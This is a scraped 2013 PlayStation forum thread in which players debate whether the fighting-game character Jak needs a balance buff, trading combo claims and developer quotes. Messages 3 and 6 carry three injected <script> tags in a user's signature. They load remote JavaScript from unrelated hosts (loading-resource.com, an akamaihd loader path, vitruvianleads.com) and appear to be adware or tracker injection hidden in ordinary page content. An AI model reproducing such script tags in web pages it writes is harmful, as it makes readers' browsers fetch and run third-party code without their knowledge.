Jan 26 2013
By: Reaper142 Monster Hunter 42 posts

If your waiting for JaK to get buffed your wasting your time

37 replies 510 views Edited Jan 26, 2013

One of the superbot employees has already said he absolutely hates JaK (Seth Killian) and everday somebody on the forums finds new JaK technology. It feels like JaK still has a lot of hidden potential and hes already a really **bleep** good character as it is. Just the other day I think someone found a combo that does 95 AP from anywhere on the map and a combo into lv1. I also found out that JaK can link his air down circle air down triangle and foward triangle( 3). I didnt know about that and that makes me wonder how many more things JaK can link into a combo that people havent accomplished yet because of difficulty. But yea guys try linking air down circle air down triangle into forward triangle(x3) it sounds easy but it definitely isnt. also thanks to bluediamond, darkerazor, and strife for keeping us up to date with new JaK tech.

Message 1 of 38 (510 Views)
0 Likes
Uncharted Territory
1976 posts

Re: If your waiting for JaK to get buffed your wasting your time

Jan 26, 2013
Yeah yeah yeah,, jaks my fav character, but the guys above don't provide us with new jak tec, most guys like me simply master there combo's . I dont need a cheep kill confirm when iv been busting rolls inside a crowd and getting three kills with his level one . What pisses me off is , his harder to land hits give LESS AP than his easy to land hits. , jak needs to get thoes moves buffed.. as of now i have little use for half his moves * all blue mods.. pathetically useless considering forward circle can be done with down circle , for more ap and etter % of landing the hit* As of now all i have to do is get you in the air and im set..
Message 2 of 38 (503 Views)
0 Likes
Gaming Beast
2167 posts

Jan 26, 2013
95 AP into super? I think you're thinking of the conversation where in a Jak thread other characters were brought up, and a point was made that other characters like FP and Cole can do 95 AP KC combos.

Jak can't even really hit 95 AP in a real match.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 3 of 38 (490 Views)
Treasure Hunter
7051 posts

[ Edited ]
Jan 26, 2013

As a Jak main that have been maining Jak *only* every single day since Launch, I still have to say Jak needs a buff. Some of his moves are just insufficient and not legit both gameplay wise and AP gain wise. Jak has mobility yes but its overrated. There was no reason for SB to nerf more then 2 guns for Jak. Only 2 guns were OP. There was no reason to nerf the Arc Wielder, Beam Reflexor, and Gyro Burster. Yes the Needle Lazer and Mass Inverter needed a nerf, but they were over-nerfed extremely. All the nerfed guns pre-nerfed is what really made Jak special and what really showed off his true potenial and how he could have been an amazing character.

For a character in this game (Jak) to have to rely on walls for AP burst combos and advanced combos is not only limtations on Jaks part but also a disadvantage to his play and fight style. Jak has no counter moves, no tricks, is the only character with less combo potential, and no support type moves. Jak has the GB as a support but its a bad designed support because of its defense, duration and lack of slowing down opponents when under fire.

When we look at all these limitations Jak has along with comparing him to characters like Drake, Ratchet, Raiden and Sly it truly shows how Jak is not a well developed character. Seriously when you look at all these factors I mentioned you can truly see how Jak is not a well finished developed character. His mobility factually does not make up for his current overall movesets. Jak has no advantages what so ever but mobility. Thats just not balanced or a fair trade overall.

Btw thanks for the mention...

photo 1-Xzveb9U_zpsedcf7d52.png
Only time will tell.
Message 4 of 38 (486 Views)
Monster Hunter
42 posts

[ Edited ]
Jan 26, 2013

Fromundaman wrote:
95 AP into super? I think you're thinking of the conversation where in a Jak thread other characters were brought up, and a point was made that other characters like FP and Cole can do 95 AP KC combos.

I hit  140Ap combos with JaK at SCR 2013. its not hard if u know the distances. BlueDiamond I know how u feel about JaK but Seth Killian feels like JaK is where hes supposed to be  and Clockwork uses JaK and feels like JaK has the tools to deal with any situation. The reason why up circle was nerfed is because it would lead into easy level 1 setups. Thats why no matter how you feel Jak needs to be buffed we will probably not see any buffs for him in the next 6 months for sure.

Message 5 of 38 (474 Views)
0 Likes
Gaming Beast
2167 posts

Jan 26, 2013

Reaper142 wrote:

Fromundaman wrote:

I hit  140Ap combos with JaK at SCR 2013. its not hard if u know the distances. BlueDiamond I know how u feel about JaK but Seth Killian feels like JaK is where hes supposed to be  and Clockwork uses JaK and feels like JaK has the tools to deal with any situation. The reason why up circle was nerfed is because it would lead into easy level 1 setups. Thats why no matter how you feel Jak needs to be buffed we will probably not see any buffs for him in the next 6 months for sure.

Huh... Well I stand corrected then, but a 95 AP combo into super? Are you sure that was for Jak? Those were thrown around in a Jak thread but about FP and Cole.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 6 of 38 (462 Views)
0 Likes
Treasure Hunter
7051 posts

[ Edited ]
Jan 26, 2013

Reaper142 wrote:

Fromundaman wrote:

Reaper142 wrote:

Fromundaman wrote:

When/where did Seth say this and Clock as well because they are honestly wrong :/ I want sources, links whatever.

Yes Jak does actually have an arsenal for every situation but the mechanics and effects of his guns for dealing with every situation was poorly determined and concluded.

As for the Mass Inverter. Thats not the only reason why it was nerfed. Trust me. Have you seen the original version of the gun. Original version compared to the current version is fine to them... smh...

photo 1-Xzveb9U_zpsedcf7d52.png
Only time will tell.
Message 7 of 38 (455 Views)
0 Likes
Monster Hunter
42 posts

Jan 26, 2013

Fromundaman wrote:

Reaper142 wrote:

Fromundaman wrote:

Huh... Well I stand corrected then, but a 95 AP combo into super? Are you sure that was for Jak? Those were thrown around in a Jak thread but about FP and Cole.

yes I will have a video soon shwoing the 95ap combo and no its not into a super its just a combo u can do anywhere on the map as long as u land the first hit. In my video ill also show my 170 Ap JaK combo ( very situational though)

as for seth killian and clockwork saying that, u should watch my match at SCR. They were the commentators and they were talking about stuff like that. Just go to twitch.tv and find the leveluplive channel. It should be leveluplive2 SCR Match day 2.

Message 8 of 38 (437 Views)
0 Likes
Gaming Beast
1823 posts

[ Edited ]
Jan 26, 2013

Reaper142 wrote:

Clockwork uses JaK and feels like JaK has the tools to deal with any situation.

Could I have a source for this? Specifically what time in that stream you're mentioning that they say that. I distinctly remember Clock himself coming here and saying they're looking into Jak's AP-Gain.

I like to make PSASBR move-sets. Here's a few:

Dart.jpg Daedalus.png Selvaria.jpg Alicia.png Dante.png Ellen.jpg

Never say I don't contribute: I'm The Idea Man.

Community Move-Set for Specter. Help build it.

Message 9 of 38 (432 Views)
Hekseville Citizen
385 posts

Jan 26, 2013
just because ur still finding new tech for a character doesnt mean he doesnt need a buff...
December 11th 2012: Went 12-0 ranked FFA. (Jak)
December 13th 2012: Went 8-0 Stock Unranked FFA. (Jak)
January 10th 2013: Sniped Asis_aka_talent into Jak's lvl 1. (Uncle Radec)
April 16th 2013: Caught parappa's lvl 2 with Sweet Tooth's lvl 1 and didn't die in the process (Sweet Tooth)
May 5th 2013: Got my Radec eviscerated by whaatxddd's radec in 1v1. Kmart, u better watch out.
Just learnt "Drake" and is now learning "Nariko".
Message 10 of 38 (417 Views)